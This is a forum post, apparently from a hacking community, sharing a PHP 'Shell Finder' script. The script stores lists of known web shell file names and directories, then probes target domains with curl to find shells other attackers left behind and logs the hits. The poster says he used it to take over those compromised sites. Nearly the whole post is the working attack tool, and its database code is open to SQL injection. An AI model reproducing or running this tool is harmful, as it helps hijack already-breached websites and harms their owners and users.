Thread Contributor: ubersakiShell Finder with database logging
#1
Heres another old script of mine I never released. I also lost the database, so you would have to sort through the code and make the DB.. which is rather easy.

A basic idea of whats going on here so you can understand it... I went on a hunt for uploaded shells and recorded the filenames, along with directories they were kept it (because people usually put them in the same place on every site) and put that info into the database. Then, I would run this against a domain and it will record all found shells. Then, I took that shit over. :)

Code:
<a href="?addurl">Add URL</a>  |  <a href="?adddir">Add Directory</a>  |  <a href="?addshell">Add Shell</a>  |  <a href="?scan">Scan Urls</a>
<br />
<br />

<?php
$dbuser = "xxxxx";
$dbpass = "xxxxx";
$debase = "sfinder_main";

mysql_connect("localhost", "".$dbuser."", "".$dbpass."");
mysql_select_db("".$debase."");   


function checkStatus($url){
     $agent = "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; pt-pt) AppleWebKit/533.20.25 (KHTML, like Gecko) Version/5.0.4 Safari/533.20.27";
 
     // initializes curl session
     $ch=curl_init();
 
     // sets the URL to fetch
     curl_setopt ($ch, CURLOPT_URL,$url );
 
     // sets the content of the User-Agent header
     curl_setopt($ch, CURLOPT_USERAGENT, $agent);
 
     // return the transfer as a string
     curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
 
     // disable output verbose information
     curl_setopt ($ch,CURLOPT_VERBOSE,false);
 
     // max number of seconds to allow cURL function to execute
     curl_setopt($ch, CURLOPT_TIMEOUT, 5);
 
     curl_exec($ch);
 
     // get HTTP response code
     $httpcode = curl_getinfo($ch, CURLINFO_HTTP_CODE);
 
     curl_close($ch);
 
     if($httpcode>=200 && $httpcode<300){
          echo $httpcode."- Shell Found - ".$url."<br />";
 $file = fopen('found.txt', 'a');
          fwrite($file, $url. "\n");
 flush();}
          else{}

}




function addDir($dir){

    $query = mysql_query("SELECT dir FROM dirnames WHERE dir = '".$dir."'");
    $result = mysql_fetch_array($query);
if(empty($result)){
 if($dir != ""){
   $addIt = mysql_query("INSERT INTO dirnames (dir) VALUES ('".$dir."') ")or die("error updating row : " . mysql_error());
   if($addIt){ echo $dir." - Added<br />";}
 }
}
}
function addShell($shell){

    $query = mysql_query("SELECT sname FROM shellnames WHERE sname = '".$shell."'");
    $result = mysql_fetch_array($query);
if(empty($result)){
   $addIt = mysql_query("INSERT INTO shellnames (sname) VALUES ('".$shell."') ")or die("error updating row : " . mysql_error());
   if($addIt){ echo $shell." - Added<br />";}
}
}
function addUrl($url){

    $query = mysql_query("SELECT url FROM url WHERE url = '".$url."'");
    $result = mysql_fetch_array($query);
if(empty($result)){
   $addIt = mysql_query("INSERT INTO url (url) VALUES ('".$url."') ")or die("error updating row : " . mysql_error());
   if($addIt){ echo $url." - Added<br />";}
}
}
function wasChecked($url){
    $query = "UPDATE url SET checked = 'yes' WHERE url = '" .$url. "'";
    mysql_query($query);
    
}
if(isset($_GET['adddir'])){
  echo "<form action=\"?adddir\" method=\"post\">
        <textarea name=\"thedirtoadd\" id=\"thedirtoadd\" cols=\"45\" rows=\"8\"></textarea><br>
<input type=\"submit\" value=\"submit\" id=\"btn\"><br /><br />
";
echo "<h1>Current Directories</h1>";
$query = "SELECT * FROM dirnames ORDER BY dir ASC";
$result = mysql_query($query);
while ($row = mysql_fetch_array($result))
{
   $saydir = $row['dir'];
echo $saydir."<br />";
}
  if(isset($_POST['thedirtoadd'])){
    $alldirnames = explode("\n", $_POST["thedirtoadd"]);
$thedircount = count($alldirnames);
    for($i=0;$i<$thedircount;$i++)
    {
$clean = preg_replace('/\s+/', '', $alldirnames[$i]);
 addDir($clean);
}
  }
}
elseif(isset($_GET['addshell'])){
  echo "<form action=\"?addshell\" method=\"post\">
        <textarea name=\"theshelltoadd\" id=\"theshelltoadd\" cols=\"45\" rows=\"8\"></textarea><br>
<input type=\"submit\" value=\"submit\" id=\"btn\">
";
echo "<h1>Current Shells</h1>";
$query = "SELECT * FROM shellnames ORDER BY sname ASC";
$result = mysql_query($query);
while ($row = mysql_fetch_array($result))
{
   $saydir = $row['sname'];
echo $saydir."<br />";
}
  if(isset($_POST['theshelltoadd'])){
    $allshellnames = explode("\n", $_POST["theshelltoadd"]);
$theshellcount = count($allshellnames);
    for($i=0;$i<$theshellcount;$i++)
    {
$clean = preg_replace('/\s+/', '', $allshellnames[$i]);
 addShell($clean);
}
  }
}
elseif(isset($_GET['addurl'])){
  echo "<form action=\"?addurl\" method=\"post\">
        <textarea name=\"theurltoadd\" id=\"theurltoadd\" cols=\"45\" rows=\"8\"></textarea><br>
<input type=\"submit\" value=\"submit\" id=\"btn\">
";
echo "<h1>Current urls</h1>";
$query = "SELECT * FROM url ORDER BY url ASC";
$result = mysql_query($query);
while ($row = mysql_fetch_array($result))
{
   $saydir = $row['url'];
echo $saydir." Checked: ".$row['checked']." <br />";
}
  if(isset($_POST['theurltoadd'])){
    $allurls = explode("\n", $_POST["theurltoadd"]);
$theurlcount = count($allurls);
    for($i=0;$i<$theurlcount;$i++)
    {
$clean = preg_replace('/\s+/', '', $allurls[$i]);
 addUrl($clean);
}
  }
}
else if(isset($_GET['scan'])) {
$dirquery = "SELECT * FROM dirnames";
$dirresult = mysql_query($dirquery);
$thedirs = array();
while ($drow = mysql_fetch_assoc($dirresult))
{
    $thedirs[] = $drow['dir'];
}
$dircount = count($thedirs);



$shellquery = "SELECT * FROM shellnames";
$shellresult = mysql_query($shellquery);
$theshells = array();
while ($srow = mysql_fetch_assoc($shellresult))
{
    $theshells[] = $srow['sname'];
}
$shellcount = count($theshells);



$urlquery = "SELECT * FROM url WHERE checked = '' ORDER BY url ASC";
$urlresult = mysql_query($urlquery);
$theurls = array();
while ($urow = mysql_fetch_assoc($urlresult))
{
    $theurls[] = $urow['url'];
}
$urlcount = count($theurls);

for($i=0;$i<$urlcount;$i++)
{

  for($z=0;$z<$dircount;$z++)
  {
  
      for($y=0;$y<$shellcount;$y++)
      {

   $fullurl = $theurls[$i].$thedirs[$z].$theshells[$y];
   checkStatus($fullurl);
echo $status;
        wasChecked($theurls[$i]);
        //echo $theurls[$i].$thedirs[$z].$theshells[$y]."- ".$mycheck."<br />";
        
      } 
  } 
}
}
?>


Possibly Related Threads…
Thread Author Replies Views Last Post
[TUT] 6 - Form->Database - Laravel Tutorial Series Baredee 6 4,727 03-30-2017, 12:00 AM
Last Post: Baredee
vBulletin plain text password logging ubersaki 0 1,502 08-17-2016, 03:32 PM
Last Post: ubersaki

Forum Jump:


Users browsing this thread: 1 Guest(s)